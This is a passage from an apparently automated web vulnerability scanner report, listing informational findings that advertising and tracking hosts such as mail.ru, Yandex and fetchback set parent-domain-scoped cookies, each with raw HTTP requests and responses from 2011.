Set-Cookie: rdrlst=40415xylk60qe00000002370113bolk7pyq0000000137010znmlk346200000003370110poljyxb4000000053701; Domain=media6degrees.com; Expires=Sat, 22-Oct-2011 14:37:38 GMT; Path=/
Set-Cookie: sglst=2020s0t7ljyxb408snm00537010i02405ag3ljyxb408snm00537010i02405; Domain=media6degrees.com; Expires=Sat, 22-Oct-2011 14:37:38 GMT; Path=/
Set-Cookie: vstcnt=417k010r014uzg6118e1002; Domain=media6degrees.com; Expires=Sat, 22-Oct-2011 14:37:38 GMT; Path=/
Location: http://ad.afy11.net/ad?mode=7&publisher_dsp_id=5&external_user_id=xrd52zkwjuxh&custom_mon=0
Content-Length: 0
Date: Mon, 25 Apr 2011 14:37:38 GMT

15.23. http://mc.yandex.ru/watch/57617 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mc.yandex.ru
Path:	/watch/57617

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

yandexuid=1458985311303741205; domain=.yandex.ru; path=/; expires=Thu, 22-Apr-2021 14:20:05 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /watch/57617?rn=540876&cnt-class=1&page-ref=&page-url=http%3A%2F%2Fwebalta.ru%2F&browser-info=j:1:s:1920x1200x16:f:10.2.154:w:1125x981:z:-300:i:20110425092015:l:4.0.60129.0:en:utf-8:v:911:c:1:t:%D0%9F%D0%BE%D0%B8%D1%81%D0%BA%D0%BE%D0%B2%D0%B0%D1%8F%20%D1%81%D0%B8%D1%81%D1%82%D0%B5%D0%BC%D0%B0%20Webalta&site-info=%7B%7D&wmode=3 HTTP/1.1
Host: mc.yandex.ru
Proxy-Connection: keep-alive
Referer: http://webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Mon, 25 Apr 2011 14:20:05 GMT
Server: Phantom/0.0.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Last-Modified: Mon, 25 Apr 2011 14:20:05 GMT
Expires: Mon, 25 Apr 2011 14:20:05 GMT
Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
Pragma: no-cache
Location: http://mc.yandex.ru/watch/57617/1?rn=540876&cnt-class=1&page-ref=&page-url=http%3A%2F%2Fwebalta.ru%2F&browser-info=j:1:s:1920x1200x16:f:10.2.154:w:1125x981:z:-300:i:20110425092015:l:4.0.60129.0:en:utf-8:v:911:c:1:t:%D0%9F%D0%BE%D0%B8%D1%81%D0%BA%D0%BE%D0%B2%D0%B0%D1%8F%20%D1%81%D0%B8%D1%81%D1%82%D0%B5%D0%BC%D0%B0%20Webalta&site-info=%7B%7D&wmode=3
Set-Cookie: yandexuid=1458985311303741205; domain=.yandex.ru; path=/; expires=Thu, 22-Apr-2021 14:20:05 GMT
Set-Cookie: yabs-sid=377248491303741205; path=/
Content-Length: 0

15.24. http://pixel.fetchback.com/serve/fb/pdc previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.fetchback.com
Path:	/serve/fb/pdc

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

cmp=1_1303742471_10164:0_10638:0_10640:0_10641:0_1437:0_1660:562799; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
uid=1_1303742471_1303179323923:6792170478871670; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
kwd=1_1303742471_11317:0_11717:0_11718:0_11719:0; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
sit=1_1303742471_719:30:0_2451:50899:45799_3236:208862:208744_782:563148:562799; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
cre=1_1303742471; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
bpd=1_1303742471; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
apd=1_1303742471; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
scg=1_1303742471; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
ppd=1_1303742471; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
afl=1_1303742471; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/pdc?cat=&name=landing&sid=719 HTTP/1.1
Host: pixel.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/page_not_found.shtml
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1303742441_10164:0_10638:0_10640:0_10641:0_1437:0_1660:562769; uid=1_1303742441_1303179323923:6792170478871670; kwd=1_1303742441_11317:0_11717:0_11718:0_11719:0; sit=1_1303742441_719:0:0_2451:50869:45769_3236:208832:208714_782:563118:562769; cre=1_1303742441; bpd=1_1303742441; apd=1_1303742441; scg=1_1303742441; ppd=1_1303742441; afl=1_1303742441

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:41:11 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cmp=1_1303742471_10164:0_10638:0_10640:0_10641:0_1437:0_1660:562799; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: uid=1_1303742471_1303179323923:6792170478871670; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: kwd=1_1303742471_11317:0_11717:0_11718:0_11719:0; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: sit=1_1303742471_719:30:0_2451:50899:45799_3236:208862:208744_782:563148:562799; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: cre=1_1303742471; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: bpd=1_1303742471; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: apd=1_1303742471; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: scg=1_1303742471; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: ppd=1_1303742471; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: afl=1_1303742471; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 25 Apr 2011 14:41:11 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 4418


<![if !IE 6]>
<script language='javascript' type='text/javascript'>
function timeout(){location.replace('http://pixel.fetchback.com/timeout.html');}
setTimeout(time
...[SNIP]...

15.25. http://pixel.quantserve.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

d=EEIAFu8kjVmtjIMLyxuBAVcBzAaBsQDe0kykaNQqOxjlwfsgkgy4F8MIOBvVeCCuOB_xAA6JIAEC22ekMA; expires=Sun, 24-Jul-2011 14:34:49 GMT; path=/; domain=.quantserve.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=627389121;fpan=1;fpa=P0-962486039-1303741255035;ns=1;url=http%3A%2F%2Fgoods.adnectar.com%2Fstatic%2Fquantcast_1.html;ref=http%3A%2F%2Fwww.livejournal.com%2F;ce=1;je=1;sr=1920x1200x16;enc=n;ogl=;dst=1;et=1303741255031;tzo=300;a=p-42U4PptTYmdC- HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://goods.adnectar.com/static/quantcast_1.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dab4f93-dea96-f475f-85ff7; d=EGUAFu8kjVmtjIMLyxuBATcBzAaBsQDe0kyka4WR_4JMMMhgggv-JgLbZ6Qw

Response

HTTP/1.1 302 Found
Connection: close
Location: http://ad.yieldmanager.com/pixel?id=1160808&id=736181&id=961753&id=688926&id=1160806&id=1057233&id=1127643&id=1206656&t=2
Set-Cookie: d=EEIAFu8kjVmtjIMLyxuBAVcBzAaBsQDe0kykaNQqOxjlwfsgkgy4F8MIOBvVeCCuOB_xAA6JIAEC22ekMA; expires=Sun, 24-Jul-2011 14:34:49 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Mon, 25 Apr 2011 14:34:49 GMT
Server: QS

15.26. http://pixel.rubiconproject.com/tap.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.rubiconproject.com
Path:	/tap.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rpb=5328%3D1%265671%3D1%264212%3D1%266286%3D1%264210%3D1%265852%3D1%264554%3D1%264214%3D1%262372%3D1%263811%3D1%262374%3D1%264222%3D1%264894%3D1%266073%3D1%262939%3D1; expires=Wed, 25-May-2011 14:54:28 GMT; path=/; domain=.rubiconproject.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tap.php?v=2939|1 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=719
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_1185=2931142961646634775; put_2132=978972DFA063000D2C0E7A380BFA1DEC; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_1197=3419824627245671268; khaos=GMMM8SST-B-HSA1; lm="21 Apr 2011 23:56:48 GMT"; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; ruid=154dab7990adc1d6f3372c12^3^1303613691^2915161843; csi15=3188371.js^1^1303615864^1303615864; csi2=3153070.js^1^1303613706^1303613706; put_1986=2724386019227846218; cd=false; put_2100=usr3fd49cb9a7122f52; rpb=5328%3D1%265671%3D1%264212%3D1%266286%3D1%264210%3D1%265852%3D1%264554%3D1%264214%3D1%262372%3D1%263811%3D1%262374%3D1%264222%3D1%264894%3D1%266073%3D1%262939%3D1; rpx=5328%3D11319%2C0%2C1%2C%2C%265671%3D11319%2C0%2C1%2C%2C%264212%3D11319%2C0%2C1%2C%2C%266286%3D11319%2C0%2C1%2C%2C%262372%3D11319%2C0%2C1%2C%2C%262374%3D11319%2C0%2C1%2C%2C%266073%3D11319%2C148%2C2%2C%2C%264210%3D11319%2C0%2C1%2C%2C%265852%3D11319%2C0%2C1%2C%2C%264222%3D11319%2C114%2C2%2C%2C%264894%3D11396%2C70%2C2%2C%2C%264554%3D11415%2C0%2C1%2C%2C%264214%3D11415%2C0%2C1%2C%2C%263811%3D11433%2C0%2C1%2C%2C%262939%3D11502%2C0%2C2%2C%2C

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:54:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=5328%3D1%265671%3D1%264212%3D1%266286%3D1%264210%3D1%265852%3D1%264554%3D1%264214%3D1%262372%3D1%263811%3D1%262374%3D1%264222%3D1%264894%3D1%266073%3D1%262939%3D1; expires=Wed, 25-May-2011 14:54:28 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=5328%3D11319%2C0%2C1%2C%2C%265671%3D11319%2C0%2C1%2C%2C%264212%3D11319%2C0%2C1%2C%2C%266286%3D11319%2C0%2C1%2C%2C%262372%3D11319%2C0%2C1%2C%2C%262374%3D11319%2C0%2C1%2C%2C%266073%3D11319%2C148%2C2%2C%2C%264210%3D11319%2C0%2C1%2C%2C%265852%3D11319%2C0%2C1%2C%2C%264222%3D11319%2C114%2C2%2C%2C%264894%3D11396%2C70%2C2%2C%2C%264554%3D11415%2C0%2C1%2C%2C%264214%3D11415%2C0%2C1%2C%2C%263811%3D11433%2C0%2C1%2C%2C%262939%3D11502%2C0%2C3%2C%2C; expires=Wed, 25-May-2011 14:54:28 GMT; path=/; domain=.pixel.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

15.27. http://pl.yumenetworks.com/dynamic_preroll_playlist.fmil previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pl.yumenetworks.com
Path:	/dynamic_preroll_playlist.fmil

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

yumerm=0rO0ABXcMAAAAAQAAAJkAAAAA; Domain=.yumenetworks.com; Expires=Sat, 29-Feb-2020 07:59:59 GMT; Path=/
ymdt=0rO0ABXcSAAAEugAAA30AAQAAAOi7eGFI; Domain=.yumenetworks.com; Expires=Sat, 04-Jun-2011 14:53:58 GMT; Path=/
ymvw=173_193_214_243_8AKTzxy2lLx8IW; Domain=.yumenetworks.com; Expires=Wed, 03-Aug-2011 14:53:58 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dynamic_preroll_playlist.fmil?domain=133BeuXuCot&width=480&height=360&imu=medrect&sdk_ver=1.8.1.2&embedAutoDetect=false&sdk_url=http%3A%2F%2Fxs%2Emochiads%2Ecom%2Fstatic%2Fglobal%2Flib%2F HTTP/1.1
Host: pl.yumenetworks.com
Proxy-Connection: keep-alive
Referer: http://games.mochiads.com/c/g/moon-volley/mvolley.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yumerm=0rO0ABXcMAAAAAQAAAJkAAAAA

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:53:58 GMT
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Set-Cookie: yumerm=0rO0ABXcMAAAAAQAAAJkAAAAA; Domain=.yumenetworks.com; Expires=Sat, 29-Feb-2020 07:59:59 GMT; Path=/
YmRmHdr: @RM153_1_232
Set-Cookie: ymdt=0rO0ABXcSAAAEugAAA30AAQAAAOi7eGFI; Domain=.yumenetworks.com; Expires=Sat, 04-Jun-2011 14:53:58 GMT; Path=/
YmDtHdr: @DT_GU
Ypp: @YP_1_1;46718_21629
Set-Cookie: ymf=null; Domain=.yumenetworks.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ymvw=173_193_214_243_8AKTzxy2lLx8IW; Domain=.yumenetworks.com; Expires=Wed, 03-Aug-2011 14:53:58 GMT; Path=/
Content-Type: application/smil
Content-Length: 3099
P3P: policyref="http://ads.yumenetworks.com/P3P/PolicyReferences.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Connection: close

<smil xmlns:yume="http://www.yumenetworks.com/resources/smilextensions" yume:refresh_time="0" yume:stagger_time="0" >
<head>
<layout>
<root-layout id="main" width="480" height="360" ba
...[SNIP]...

15.28. http://pl.yumenetworks.com/static_beacon_47953_0_22860_16844_6237426397_0_0_0_133BeuXuCot.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pl.yumenetworks.com
Path:	/static_beacon_47953_0_22860_16844_6237426397_0_0_0_133BeuXuCot.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

yumerm=0rO0ABXcMAAAAAQAAAJkAAAAA; Domain=.yumenetworks.com; Expires=Sat, 29-Feb-2020 07:59:59 GMT; Path=/
ymf=0rO0ABXcFAadrgwA*; Domain=.yumenetworks.com; Expires=Tue, 24-May-2011 14:54:01 GMT; Path=/
yumerm=0rO0ABXcMAAAAAQAAAJkAAAAA; Domain=.yumenetworks.com; Expires=Sat, 29-Feb-2020 07:59:59 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /static_beacon_47953_0_22860_16844_6237426397_0_0_0_133BeuXuCot.gif?replay_count=0&volume=100 HTTP/1.1
Host: pl.yumenetworks.com
Proxy-Connection: keep-alive
Referer: http://games.mochiads.com/c/g/moon-volley/mvolley.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yumerm=0rO0ABXcMAAAAAQAAAJkAAAAA; ymdt=0rO0ABXcSAAAEugAAA10AAQAAAOi7eGFI; ymvw=173_193_214_243_18R1PA3QCjJVp0

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 25 Apr 2011 14:54:01 GMT
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Set-Cookie: yumerm=0rO0ABXcMAAAAAQAAAJkAAAAA; Domain=.yumenetworks.com; Expires=Sat, 29-Feb-2020 07:59:59 GMT; Path=/
YmRmHdr: @RM153_0_232
Set-Cookie: ymf=0rO0ABXcFAadrgwA*; Domain=.yumenetworks.com; Expires=Tue, 24-May-2011 14:54:01 GMT; Path=/
Set-Cookie: yumerm=0rO0ABXcMAAAAAQAAAJkAAAAA; Domain=.yumenetworks.com; Expires=Sat, 29-Feb-2020 07:59:59 GMT; Path=/
Location: http://ad.doubleclick.net/imp;v1;f;238884748;0-0;0;61850871;1|1;41734709|41752496|1;;cs=o;%3fhttp://ad.doubleclick.net/dot.gif?1303743241655
Content-Length: 0
P3P: policyref="http://ads.yumenetworks.com/P3P/PolicyReferences.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Connection: close
Content-Type: image/gif

15.29. http://pogoda.webalta.ru/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pogoda.webalta.ru
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

pogoda_reg=10290; expires=Tue, 24-Apr-2012 14:20:55 GMT; path=/; domain=.webalta.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: pogoda.webalta.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.2.10.1303741218

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:20:55 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: pogoda_reg=10290; expires=Tue, 24-Apr-2012 14:20:55 GMT; path=/; domain=.webalta.ru
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10431

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>............ ...
...[SNIP]...

15.30. http://r2.mail.ru/b12179277.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12179277.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=pPUGAEqlaAAA; expires=Wed, 24-Apr-13 14:20:49 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12179277.gif HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:20:49 GMT
Content-Type: image/gif
Content-Length: 258
Connection: keep-alive
Set-Cookie: p=pPUGAEqlaAAA; expires=Wed, 24-Apr-13 14:20:49 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:20:49 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

GIF89a..!...............................................................................................................................................................................................
...[SNIP]...

15.31. http://r2.mail.ru/b12179279.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12179279.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=6ooGAFT5qgAA; expires=Wed, 24-Apr-13 14:21:12 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12179279.gif HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:12 GMT
Content-Type: image/gif
Content-Length: 294
Connection: keep-alive
Set-Cookie: p=6ooGAFT5qgAA; expires=Wed, 24-Apr-13 14:21:12 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:12 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

GIF89a{.......................8..P.....I..$..A...............!.......,....{......0.I..8.....!.di.h..l.....tm.x..|..@.DA,....r.l:...BR.Z...v..z.... .....z.n....|>.$...~......... .......................
...[SNIP]...

15.32. http://r2.mail.ru/b12179280.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12179280.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=t9UGAE3BGQAA; expires=Wed, 24-Apr-13 14:21:12 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12179280.gif HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:12 GMT
Content-Type: image/gif
Content-Length: 70
Connection: keep-alive
Set-Cookie: p=t9UGAE3BGQAA; expires=Wed, 24-Apr-13 14:21:12 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:12 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

GIF89a...................!.......,.............#....D-..,.i^'T....R..;

15.33. http://r2.mail.ru/b12201458.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12201458.png

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=19oGAErbVQAA; expires=Wed, 24-Apr-13 14:21:12 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12201458.png HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:12 GMT
Content-Type: image/png
Content-Length: 1232
Connection: keep-alive
Set-Cookie: p=19oGAErbVQAA; expires=Wed, 24-Apr-13 14:21:12 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:12 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

.PNG
.
...IHDR............e.t.....tEXtSoftware.Adobe ImageReadyq.e<...diTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

15.34. http://r2.mail.ru/b12526055.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12526055.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

